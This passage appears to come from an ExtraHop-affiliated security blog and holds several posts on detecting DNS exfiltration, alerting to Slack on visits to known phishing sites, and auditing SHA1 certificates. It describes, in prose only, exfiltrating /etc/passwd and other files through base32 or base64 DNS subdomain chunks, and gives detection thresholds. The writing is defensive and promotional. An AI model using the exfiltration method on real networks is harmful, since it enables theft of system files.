SIEM Integration:The ODS feature of the ExtraHop platform can send protocol violations to your SIEM workflow. As most CSRIT responses are tied to some sort of SIEM and ExtraHop can thread wire data surveillance into those workflows seamlessly.

Slack updates:If you have a distributed SECOPS team or you want the flexibility of creating a Slack channel and assigning resource to watch it, the ability to leverage RESTFUL API’s to allow integration with other tools can greatly enhance the agility and effectiveness of your security incident response teams. Below you see an example of sending a link to the alert or the actual alert itself into a slack channel. In our example above, if you are a member of the PCI team or on the governance side of the house (or both for that matter) you can easily collaborate here. In the scenario below, the INFOSEC resource can actually chat with the system owner to find out if this is, in fact, suspicious activity. The majority of crimes that result in arrest do so as a result of a citizen calling the police and the two working together to determine if a crime has been committed. Sadly this dynamic doesn’t exist in IT today, we are creating it for you below (Alerts are sent within a few milliseconds).

(Click Image)

Tetration Nation:One big announcement last week at Cisco Live was the ExtraHop integration with Cisco’s Tetration product. Below you see an example of how the ExtraHop platform handles a Ransomware outbreak. The workflow for protocol violations is the same, should the Discover appliance observe unauthorized communications, the traffic can be tagged and sent to the Cisco Security Policy Management engine where policies can be enforced.

Conclusion:One of the battle-cry’s for security in 2017 has been the need to simplify security. Top-down device discovery simply does not work and leaves room for bad actors as well as insider threats to work in the dark. A foundational security practice that includes passive device discovery provides the ground-up approach to security that can then lay the ground work for building a much more stable security practice. Distilling communications down to who is talking to who and is it authorized or not has been impossible for far too long. Leveraging ExtraHop’s segment auditing capabilities positions you to know, within milliseconds, when a system is operating outside its normal pre-defined parameters. When coupled with ExtraHop Addy you can obtain full-circle visibility 24×7.

A few days ago SANS wrote an article about the importance of tracking DNS Query length stating emphatically “Size Does Matter”. It’s an excellent article and certainly worth a read, you can find it here

The article demonstrates how easy it is to exfiltrate a file using the DNS Channel. They ran a script that encoded the /etc/passwd file into base32 chunks and exfiltrated the file to an external DNS Server. Since the subdomain limit is 63 characters or less they used all 63 characters to append an encoded text string onto the subdomains allowing them to push the data externally using the internal corporate DNS server as the mule in the process.

Just before showing us the Splunk Histograms they did something VERY unique, they showed you the following command:

As you are aware, tcpdump is a wire analysis sniffing tool that shows you packets as they are being observed on the wire. If ONLY there were a way to take action against this behavior as it was being observed on the wire. What if I told you there was one? And you probably didn’t even know you could leverage it in your security practice!

Enter Wire Data:In a way, the SANS article provided a Segway for me to demonstrate the power of wire data. The ExtraHop platform provides full, in flight stream analysis and has the capability to interact with external APIs that may be able to actually STOP DNS exfiltration instead of telling you that it had already happened.

So to do a similar test, I ran something similar attempting to use base64 to exfiltrate a much larger filer called blockedIPs.txt using the following script named dnsjackassery.sh. I then used an online stopwatch to count the time from when I executed the script to when it finished. The entire text file was exfiltrated in 8.01 seconds. Basically by the time it is rendered in Splunk, the data has already been exfiltrated. That doesn’t mean that the splunk scenario isn’t valuable but leveraging wire data we can do A LOT more than just tell your SOC that they have been breached.

Below you see that the script was able to exfiltrate the entire file in 8.01 seconds.

So in looking at the time it took to exfiltrate the entire BlockedIPs.txt file, 8.01 seconds isn’t really a lot to work with as your SOC does not have a crystal ball. BUT, in the world of wire data analytics where you deal in microseconds, seconds are hours! Below is a diagram of how we have set up the ExtraHop appliance to alert us when DNS exfiltration takes place. Since I don’t have an active OpenDNS account I am using the Slack API to demonstrate how the ExtraHop platform can integrate with intelligent services. For this test we set the following criteria using ExtraHop’s Application Inspection Triggers.

DNS length of greater 63 or greater

Not part of B2B partners’, or Internal Namespace

Not a common CDN like Akamai or amazonaws.com

There will always be SOME white listing that will need to occur to avoid digital collateral damage. If the site is a .ru, .cn or in this case, a .be and I am a hospital in Minneapolis than I doubt that I have an abundance of business with those name spaces and I feel pretty comfortable bit-bucketing them via OpenDNS or another next generation DNS product.

So upon executing the dnsjackassery.sh script we begin to see results populating our Slack channel within a few milliseconds. This could just as easily be an API call to your DNS service to “black hole” the suspect domain.

Transaction speed: In the two images below, you can note the performance of the slack transactions. You can see an average round trip time of 41ms with an average processing time of 58ms. I would expect an API call to OpenDNS to be similarly fast basically meaning that you have plenty of time to stop a file from being fully transferred using DNS exfiltration. The point here is, unlike many SIEM based solutions, you are well positioned to counter-punch using ExtraHop and Wire Data Analytics.

Slack Performance Metrics: Taken from the ExtraHop Appliance

The article also made a point to suggest that you also monitor the subdomain counts (they are one of the few to do that, tip of the hat to ya!). Using the ExtraHop platform, we also keep track of the number of subdomains by Client/Domain combo. If you look below, you see the number of lookups for a specific domain from a single IP. Unless it is a NATed address with a few hundred users behind it, it is pretty safe that a large number of the metrics below are NOT human metrics but some sort of program doing the lookups. Even the fastest internet users cannot perform more than a few DNS queries in a 30 second period.

Also noted in the SANS article was the need to pay attention to query lengths. Here we have written a trigger to give you the average query length by root domain. This can, as well as the subdomain count, metrics can be leveraged with an API to actually orchestrate a response via OpenDNS or another product.

Conclusion:There is a big push to add automation and orchestration to most security practices. This is more difficult than it reads/sounds. In the case of DNS Exfiltration, many SIEM based products, while still quite valuable, lack the shutter-speed to successfully observe and react to DNS based exfiltration. However, when you leverage the power of ExtraHop’s Wire Data Analytics and the Open Data Stream (ODS) technology allowing you to orchestrate responses the job becomes almost trivial. As I stated, in our world, seconds are hours and minutes are days. The number of orchestration products hitting the cyber security market are going to make show floors look like a middle-school science fair where practitioners are going to feel like they are looking at a myriad of baking-soda volcanos! Orchestration is only as good as the visibility integrated into it, good visibility starts with wire data, good visibility starts with the ExtraHop platform.

*PS anyone running OpenDNS and familiar with the API, I’d LOVE to try counter punching using the techniques described here!!

In this post, we will couple ExtraHop’s wire data analytics, Anomali STAXX, a leading threat intelligence solution and Slack, a cloud-based collaboration platform to demonstrate how we can use orchestration and automation in a manner that helps today’s under-(wo)manned security teams meet today’s threats with the level of agility needed!

I was fortunate enough to be selected to speak at RSAC 2017 and it was surely a career highlight for me. As several analysts pointed out post-show, automation and orchestration seemed to be the flavor of the year. Over the last 36 months it has become glaringly obvious that we simply cannot keep bad actors and malicious software off of our networks. I have been preaching the folly of perimeter (only) based security since 2010. The speed with which systems are now compromised and the emergence of the “human vector” through phishing has all but assured us that the horde is behind the wall and needs to be directly engaged. The reliance on logs, SIEM products will give you a forensic view of what is going on but will do little to be effective against today’s threats where a system could be compromised by the time the log is written.

While the idea of automation and orchestration is a great one, there are issues with it and will not be the first time “self-defending networks” have been brought to market. Bruce Schneier makes a very good point in his “Schneier on Security” blog post when he states the following:

“You can only automate what you’re certain about, and there is still an enormous amount of uncertainty in cyber security”. He also makes one of the greatest quotes in INFOSEC history when he states “Data does equal information and information does not equal understanding”.

Perhaps the battle here is to get to a place of certainty, I too was once an advocate of “log everything and sort it out later” but the process of sorting through the data become extremely tedious and the amount of work it took to get to “certainty” I believe, gave bad actors time to operate while I wrote SQL queries, batch processes and parsing scripts for my context-starved data sets. Couple this with the fact that teams are digitally bludgeoned to death with alerts and warnings that the “INFOSEC death sentence” starts to take root as people get desensitized to the alerts.

So where do we find certainty and how do we use it?While the industry is still developing, there have been great strides in Threat Intelligence. ISACs around the world are working together to build shared intelligence around specific threats and making the information readily available via TAXII, STIXX and CIF. There is even a confidence level associated with each record that we are able to use as a guide to determine if a specific action is needed. The challenge with good threat intelligence is how we make it usable. Currently most threat Intel is leveraged in conjunction with a SIEM or logging product. While I certainly advocate for logs, there are some limitations with them.

Not everything logs properly (IoT Systems normally have NO logging at all)

You have a data gravity issue (you have to move the data into the cloud to be evaluated or you have to store petabytes of data to evaluate)

In some cases, only a small portion of the log is usable (but you pay to index the entire log with most platforms)

Their use is largely forensic with many of today’s threats

The case for Wire Data Analytics:The key difference that I want to point out here is that using Wire Data Analytics with ExtraHop you can perform quite a bit of analysis in flight. ExtraHop “takes” data off the wire and is not dependent on another system to “give” the data to it. The only prerequisite for ExtraHop is an IP address. Examples of how I have made a SIEM more effective using wire data include:

Reducing Logging by 5000% by looking at logins by IP and calculating the total THEN sending a syslog message to the SIEM for those IPs with more than 100 logins vs. sending tens of thousands of logs per minute to the SIEM and checking on the back end

Checking an EGRESS transaction to against threat intelligence THEN sending the syslog if there is a match

In an enterprise with tens of thousands of employees, rather than logging EVERY failed login, aggregate records into five minute increments then send those with more than 5 login failures to the SIEM.

The point here is that you can deliver some context when you leverage wire data analytics with your SIEM workflows. Using SIEM-only, you must achieve context by aggregating the logs and looking at them after they are written. Using ExtraHop with your SIEM, you are able to achieve context (and more importantly, get closer to Mr. Schneier’s certainty) BEFORE sending the data to the SIEM. You can keep all the workflows that are tied to the incumbent SIEM system, you are just getting better, and fewer, logs. Should I disable an account that has 50 login failures in the last five minutes (Locked out or not)…..HELL YES! While I don’t think that automation and orchestration are a panacea, I think there are SOME cases where the certainty level is high enough to orchestrate a response. Also, I believe that automation and orchestration is not just for responding but can be used to make your SOC more effective.

Now that I have, hopefully, established the merits of using Wire Data Analytics, let’s keep in mind orchestration does NOT have to be a specific action or response. Orchestration can also be used to make your team more agile and hopefully, more effective. Most security teams I come across have at least one, two and in some cases, three open positions. The fact is, at a time when threats are becoming more complex, finding people with the needed skills to confront them is harder than ever. The situation has gotten so bad that the other day I typed “Human Capital Crisis” in Google and it auto-filled “in cybersecurity”. The job is getting tougher and there are fewer of us doing it, what I am going to show you in this post will never replace a human being but it might ease some of the heavy lifting that goes into achieving situational awareness.

PHISHING: “PHUCK YOU, YOU PHISHING PHUCKS!!!”Anyone who has ever been phished or worked in an organization that is experiencing a phishing/spear phishing campaign has felt exactly as the section title says. Lets have a look at how we can help our security teams get better data by leveraging the API’s of three unique platforms to warn them when a known phishing site has been accessed.

For those of us who are working too hard to bring context to the deluge of data, my suggestion…get some REST!!! Below I am going to walk you through how I can monitor activity to known phishing sites by doing a mash up of three technologies using the RESTFUL API of all three platforms.

Solution Roster:

ExtraHop Discovery/Explorer appliance
ExtraHop provides wire data analytics and surveillance by working from a mirror of the traffic. Think of it as a CCTV for packets/transactions.

Anomali STAXX Virtual Machine
Anomali STAXX provides me lists of current threat intelligence. Think of this as equipping the CCTV operator with a list of suspicious characters to look for.

Slack Collaboration Community
Slack provides me a community at packetjockey.slack.com where my #virtualsoc team operations from anywhere in the world.

A python peer (Windows or Linux)This is the peer system that accesses the threat intelligence and pulls it off of the STAXX system and uploads the threat intelligence to the ExtraHop appliance.

How it works:As you can see in the drawing below, the Linux peer uses the REST API to get a list of known phishing sites then executes a Python script to upload the data into the memcache on the ExtraHop appliance equipping it with the threat intelligence it needs. The ExtraHop appliance uses an application inspection trigger that checks every outgoing URI to see if it is a known phishing site. If there is a match, an alert is sent to Slack, Email/SMS in addition to being logged on their own internal dashboards and search appliance.

Click Image

What the final product looks like:From my Linux box, (I don’t dare go to these sites on my Windows or Mac laptop) I do a “wget” on one of the known phishing sites and within milliseconds (Yes milliseconds, watch the video if you don’t believe me). We get the client IP, Server IP and the site that they went to. From here we can find out who owns that client machine and get them to change their password immediately as well as issue an ACL for the server in case this is a spear phishing campaign and they are targeting specific uses. Also, before you ask, “Yes” we can import the list of known malicious email addresses and monitor key executive recipients in case one of them gets an email from a known malicious address. We can also check HTTP referrers against the phish_url threat intelligence.

In the screenshot below, you see my “wget” command and the result at 11:23:53 and you can see that the Slack warning came in at 11:26. If you watch the video you will see it takes milliseconds.

I believe that by using slack you can also color code certain messages and program in that awesome “WTF” emoji (if one exists) for specific messages ExtraHop sends. Also, if you are not comfortable with specific information being sent to slack, we can configure the appliance to send you a link to the LOCAL URI that ONLY you and your team can access.

Conclusion:While there is a lot of buzz around Orchestration and Automation I believe the pessimism around it is justified. Security teams have been promised a lot over the last few years and what we have found, especially lately, is that a lot of tried-and-true solutions either lack the shutter-speed or context to be effective. Here we are doing some orchestration and automation but we are doing so in order to give the HUMAN BEING better information. Our security director made a very good point to me the other day when he said the last thing a security team wants is more data. What we have hopefully shown in this post is that if you have open platforms like Anomali, SLACK and ExtraHop, you can craft an automation and orchestration solution that can actively help security teams in a manner that still leverages the nuance and rationalization that only exists in a human being. While there will be solutions that will effectively automatically block certain traffic, issue ACLs, Disable accounts, etc. We can also use automation to do some of the heavy lifting for today’s out(wo)manned security teams. To get where I think the Cyber Security space needs to be, it is going to take more than one product/tool/platform. If you have a solution that is closed and does not support any kind of RESTFUL API or open architecture, unless it fulfills a specific niche, get rid of it. If you are a vendor and you are selling a solution that is closed, do so at your own peril as I believe closed systems are destined to go the way of the dinosaur. By leveraging wire data with existing workflows, you can drastically reduce your TTWTF (time to WTF!??) and be better positioned to trade punches with tomorrow’s threats.

Not exactly new news here but in case you have been in a coma the last two weeks. Google managed to engineer a successful SHA1 attack and intends to release the source code somewhere on or around the May 24th time frame. According to BusinessWire.com 21% of websites are still using SHA1 certificates. Basically over 1/5 of the sites on the internet are using a woefully weak cipher suite and if they are still doing so near the end of May, they will be doing so with the source code for how to exploit them. A colleague of mine once told me, as I was lamenting my frustration at apathy in the enterprise, “Sheep hate the sheep dog more than the wolf”. In this case, I see it more a matter of the sheep dog being so fed up that he or she is basically warning them that they will not only be left behind, but they are going to tell the wolves how to get at them. You may or may not agree with this methodology but regardless, those who do not heed the warning and fall in with the rest of the flock may find themselves being part of the “thinning the herd” as, most assuredly, the wolves will gather. One of the challenges in many enterprises is understanding what your exposure is. There are tools that will let you scan systems, etc. but the process is two-fold. You could spend hundreds of hours securing your servers only to be breached by a B2B Partner or an IoT device that has a weak cipher. While over 1/5 of the internet is still using SHA1, I am betting that internally it is much worse. If we have learned anything over the last 36 months it’s that the perimeter won’t keep folks out and while the wolves may gather in the DMZ, they will work just as easily in the dark when Fred in payroll opens that Email attachment or clicks that picture. As enterprise folks, we own the responsibility for thinning our own flock and keeping our own strays in line.

You may be wondering how you can do this, both internal, external and B2B? It may not go over well if you called your B2B partners and told them you were going to start scanning their systems. A solution that allows you to engage in careful surveillance of all SSL transactions and determine the cipher suites used will position you to be able to determine your entire exposure without scanning or crawling yours or any other’s network. Using ExtraHop’s wire data analytics you can observe your SSL Transactions and will be able to start the process of getting out of technical debt by fixing the issues one system, network and B2B partner at a time.

From the same cited article above, getting visibility into what your exposure is can be difficult:

“The results of our most recent analysis are not surprising” said Kevin Bocek, chief security strategist for Venafi. “Even though most organizations have worked hard to migrate away from SHA-1, they don’t have the visibility and automation necessary to complete the transition. We’ve seen this problem before when organizations had a difficult time making coordinated changes to keys and certificates in response to Heartbleed, and unfortunately I’m sure we are going to see it again.”

If you leverage our wire data analytics platform you can easily audit your exposure by using one of our canned reports on Cipher auditing or set up a quick trigger to audit it yourself.

How it works:ExtraHop sits back passively and observes network traffic via a mirror (Tap, Span, etc). So within this Application Inspection Trigger I am doing the following:

Checking to see if the Certificate signature has “SHA1″ anywhere.

If it exists, I write the record to our EXA Elastic appliance where I can get a quick look at what my exposure is to SHA1 both from clients and servers. I can also see who issued the weak certificate (be ready to call you IoT vendors and shrink wrapped software)

Click Image:

Once we have started to write the information to the ExtraHop Explorer Appliance (EXA) we can get an idea of what our exposure is in two clicks (allowing sufficient time to build the data set)

Click 1: Select “SHA1 Audit” from the Record Type combo box.

Click Image:

Click 2: In the “Group By” combo box, select “Server IP Address”
Below you see a list of every server using SHA1. Some of them are internet servers and some of them are internal systems. If we want, we can separate internal systems within the trigger using the .isRFC1918 function and only look at our internal systems.

Click Image:

Conclusion:Over the next two months, it will be important that we are able to determine our exposure to SHA1, not only for the servers we have on the internet, but internally and within the cloud providers that we are using. Moore’s law has dictated the hardware and computing power to break cipher suites will continue to get better and cheaper. SHA1 had a run of over 20 years (although it has been considered week for the last few years). Cipher suites becoming obsolete is part of the digital cycle of life. It took me a few minutes to write the trigger you see here and we already have canned auditing tools in the ExtraHop bundle gallery.

Getting visibility this quickly and getting an idea of our risk as easily as this is why we “wire data”.